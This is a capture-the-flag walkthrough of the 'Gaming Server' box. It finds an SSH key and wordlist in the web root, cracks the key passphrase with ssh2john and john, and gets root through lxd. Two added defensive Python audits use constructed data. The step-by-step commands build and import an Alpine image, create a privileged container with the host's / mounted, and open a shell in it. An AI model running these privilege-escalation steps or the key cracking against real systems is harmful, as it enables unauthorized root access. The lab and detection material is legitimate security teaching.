Gaming Server

rustscan

Not too much to go on. Let's have a look at the website.

After looking around and clicking through, there wasn't much to go on. However, looking at the page source we find a name!

But, I'm not convinced that's all we need just yet. Let's run a feroxbuster and see if we can find something.

Nice! Uploads and Secret. Let's have a look.

Let's take a look at secret first.

SecretKey looks promising.

We got an ssh key. That can't be a bad thing. Before we try ssh'ing in, let's check out uploads also.

manifesto.txt gives us a little clip of the actual Hacker Manifesto.

Then a meme for meme.jpg lol. We can come back and check that if we need to. Not going to waste time on it unless we get stuck.

Let's check out the more interesting file in Uploads, dict.lst.

And now we have what looks like a password list we can use.

Alright, let's try to put all this together and see what happens. We have a name, a password list and an ssh key. We should be good now... hopefully.

Let's grab that dict.lst first.

Okay, so when we try to log in as john with the ssh key we found, it asks us for a passphrase.

So, let's run ssh2john on our ssh key and see if we can then use john to crack the passphrase.

Once we have a hash for john to crack, we can use the following command to crack it:

john hash

I just tried with john's standard dictionary and it cracked it very quickly. It also worked with the supplied dict.lst.

Now we should be able to log in via ssh with john's creds.

And we are in!

We can now print out the user.txt easily
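The two findings that made this foothold possible (a private key served from the web root, and its passphrase being weak enough to crack from a wordlist that was also served from the web root) are the kind of thing a defender can catch with a periodic audit. The following is an added example, not part of the original walkthrough: it walks a directory tree the way a web server would serve it, reports every PEM-encoded private key it finds, and says whether the key is passphrase-protected. Legacy PEM keys announce encryption with a `Proc-Type: 4,ENCRYPTED` header; newer `openssh-key-v1` keys carry the cipher name inside the base64 blob, where `none` means no passphrase. The sample web root it builds (a `secret/secretKey` and an `uploads/` directory) is constructed from filler, not real key material.

```python
"""Audit a served directory tree for exposed SSH private keys (added example, constructed data)."""
import base64
import os
import re
import tempfile

# Matches any PEM private-key block and captures its type label and body.
PEM_RE = re.compile(
    rb"-----BEGIN ([A-Z ]*PRIVATE KEY)-----\r?\n(.*?)-----END \1-----", re.S
)


def classify_private_key(data: bytes):
    """Return (key_type, has_passphrase) for the first PEM private key in data, else None.

    has_passphrase is None when the key could not be parsed far enough to tell.
    """
    m = PEM_RE.search(data)
    if not m:
        return None
    key_type = m.group(1).decode()
    body = m.group(2)
    if key_type == "OPENSSH PRIVATE KEY":
        # openssh-key-v1 layout: magic, then a length-prefixed ciphername.
        # A ciphername of "none" means the key is stored unencrypted.
        try:
            blob = base64.b64decode(b"".join(body.split()))
        except ValueError:
            return key_type, None
        off = len(b"openssh-key-v1\x00")
        if not blob.startswith(b"openssh-key-v1\x00") or len(blob) < off + 4:
            return key_type, None
        n = int.from_bytes(blob[off:off + 4], "big")
        cipher = blob[off + 4:off + 4 + n].decode("ascii", "replace")
        return key_type, cipher != "none"
    # Legacy PEM (RSA/DSA/EC PRIVATE KEY): passphrase-protected keys carry
    # "Proc-Type: 4,ENCRYPTED" and "DEK-Info:" header lines before the base64.
    return key_type, b"Proc-Type: 4,ENCRYPTED" in body


def audit_webroot(root: str):
    """Walk root and return sorted (relative_path, key_type, has_passphrase) for every key found."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read(1 << 20)  # keys are small; cap the read for large uploads
            except OSError:
                continue
            result = classify_private_key(data)
            if result:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, result[0], result[1]))
    return sorted(findings)


def _fake_openssh_blob(cipher: str) -> bytes:
    """Constructed openssh-key-v1 header (magic + ciphername only); not a real key."""
    raw = b"openssh-key-v1\x00" + len(cipher).to_bytes(4, "big") + cipher.encode()
    return base64.encodebytes(raw)


def build_sample_webroot() -> str:
    """Create a constructed web root with one passphrase-protected key and one unprotected key."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "secret"))
    os.makedirs(os.path.join(root, "uploads"))
    # Legacy PEM key with a passphrase; the body is filler, not key material.
    with open(os.path.join(root, "secret", "secretKey"), "wb") as fh:
        fh.write(b"-----BEGIN RSA PRIVATE KEY-----\n"
                 b"Proc-Type: 4,ENCRYPTED\n"
                 b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                 b"QUJDREVGR0g=\n"
                 b"-----END RSA PRIVATE KEY-----\n")
    # OpenSSH-format key stored without a passphrase (ciphername "none").
    with open(os.path.join(root, "uploads", "id_ed25519"), "wb") as fh:
        fh.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
                 + _fake_openssh_blob("none")
                 + b"-----END OPENSSH PRIVATE KEY-----\n")
    # A wordlist is not a key and must not be reported.
    with open(os.path.join(root, "uploads", "dict.lst"), "w") as fh:
        fh.write("password\nletmein\n")
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    for path, key_type, protected in audit_webroot(sample):
        state = {True: "passphrase-protected", False: "NO PASSPHRASE"}.get(protected, "unknown")
        print(f"{path}: {key_type} ({state})")
```

Point `audit_webroot` at a real document root and treat every hit as a finding regardless of the passphrase column: a protected key that is publicly downloadable is still offline-crackable, exactly as the walkthrough shows.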

Now let's get root!

After looking around for a while and running linpeas, it looks like the best path to take is the lxc/lxd privesc method.

We're going to follow the exploit from HackTricks step by step to hopefully get root.

Step 1. On our attack machine.

Install Requirements

sudo apt update

sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools

Clone Repo

git clone https://github.com/lxc/distrobuilder

Make Distrobuilder

cd distrobuilder

make

Prepare the creation of the Alpine image

mkdir -p $HOME/ContainerImages/alpine/

cd $HOME/ContainerImages/alpine/

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

Create the Container

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

Start a python3 server to serve the created files

python3 -m http.server 80

Step 2. On the target machine.

Upload the image files we built (lxd.tar.xz and rootfs.squashfs) to the target machine.

Add the Image

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

View the new image

lxc image list

Create a privileged container (the root path is added further down)

lxc init alpine privesc -c security.privileged=true --alias=alpine

💡 I had to remove the --alias=alpine to make this work.

Let's make sure it worked

lxc list

Looking good!

Let's add the root path now.

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

💡 If you get the error "Error: No storage pool found. Please create a new storage pool", a storage pool has to exist before this step will work.

Let's start the container and get a shell in it

lxc start privesc

lxc exec privesc /bin/sh

Now, let's run id and whoami.

WE ARE ROOT!

We are inside the container, with the host's filesystem mounted at /mnt/root, so navigation is a little weird here but nothing too bad.

cd /mnt/root/root

And we have our root flag!
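Everything from linpeas onwards hinges on two host-side conditions: an unprivileged user sitting in the lxd group, and the ability to create a container with security.privileged=true plus a disk device whose source is the host's /. Both are visible to the host administrator, and the following is an added detection example (not part of the walkthrough or of HackTricks) that checks for them. It takes a snapshot of /etc/group and the JSON that `lxc list --format json` prints, and flags non-root members of container-admin groups and any container that is privileged or mounts the host root. The sample group file and the sample instance list below are constructed; the assumed JSON shape (objects with "name", "expanded_config" and "expanded_devices") matches lxc's output but is an assumption here, so adjust the key names if your version differs.

```python
"""Flag LXD privilege-escalation exposure from /etc/group and `lxc list --format json` (added example)."""
import json

# Membership in these groups is root-equivalent on the host.
CONTAINER_ADMIN_GROUPS = {"lxd", "lxc", "docker"}


def group_members(etc_group_text: str) -> dict:
    """Parse /etc/group content into {group_name: [member, ...]}."""
    members = {}
    for line in etc_group_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = (line.split(":") + ["", "", "", ""])[:4]
        name, users = fields[0], fields[3]
        members[name] = [u for u in users.split(",") if u]
    return members


def risky_group_members(etc_group_text: str) -> dict:
    """Return {group: [non-root members]} for container-admin groups that have any."""
    out = {}
    for group, users in group_members(etc_group_text).items():
        if group in CONTAINER_ADMIN_GROUPS:
            non_root = [u for u in users if u != "root"]
            if non_root:
                out[group] = non_root
    return out


def risky_containers(lxc_list_json: str) -> list:
    """Return [(name, [reason, ...])] for containers that are privileged or mount host /.

    Assumes each instance object carries 'name', 'expanded_config' and
    'expanded_devices' (falls back to 'config' / 'devices').
    """
    findings = []
    for inst in json.loads(lxc_list_json):
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        reasons = []
        if str(cfg.get("security.privileged", "false")).lower() == "true":
            reasons.append("security.privileged=true")
        for dev_name, dev in devs.items():
            # The default 'root' disk has a 'pool' and no 'source'; a host bind
            # mount of / is a disk device whose source is the host root.
            if dev.get("type") == "disk" and dev.get("source") in ("/", "/."):
                reasons.append(f"disk device '{dev_name}' mounts host / at {dev.get('path')}")
        if reasons:
            findings.append((inst["name"], reasons))
    return findings


# Constructed sample: a user in the lxd group, as on the box in the walkthrough.
SAMPLE_ETC_GROUP = """root:x:0:
sudo:x:27:
lxd:x:108:john
docker:x:999:
"""

# Constructed sample of `lxc list --format json` with one abusive and one benign container.
SAMPLE_LXC_LIST = json.dumps([
    {
        "name": "privesc",
        "status": "Running",
        "expanded_config": {"security.privileged": "true"},
        "expanded_devices": {
            "host-root": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"},
            "root": {"type": "disk", "path": "/", "pool": "default"},
        },
    },
    {
        "name": "web",
        "status": "Running",
        "expanded_config": {},
        "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}},
    },
])


if __name__ == "__main__":
    for group, users in risky_group_members(SAMPLE_ETC_GROUP).items():
        print(f"group {group}: non-root members {users} (root-equivalent on the host)")
    for name, reasons in risky_containers(SAMPLE_LXC_LIST):
        print(f"container {name}: " + "; ".join(reasons))
```

On a real host, feed it `cat /etc/group` and `lxc list --format json` output; the lxd-group finding is the one to fix (remove the user, or treat the membership as sudo), while the container finding is what you would expect to see in the audit trail once the walkthrough's steps have been run.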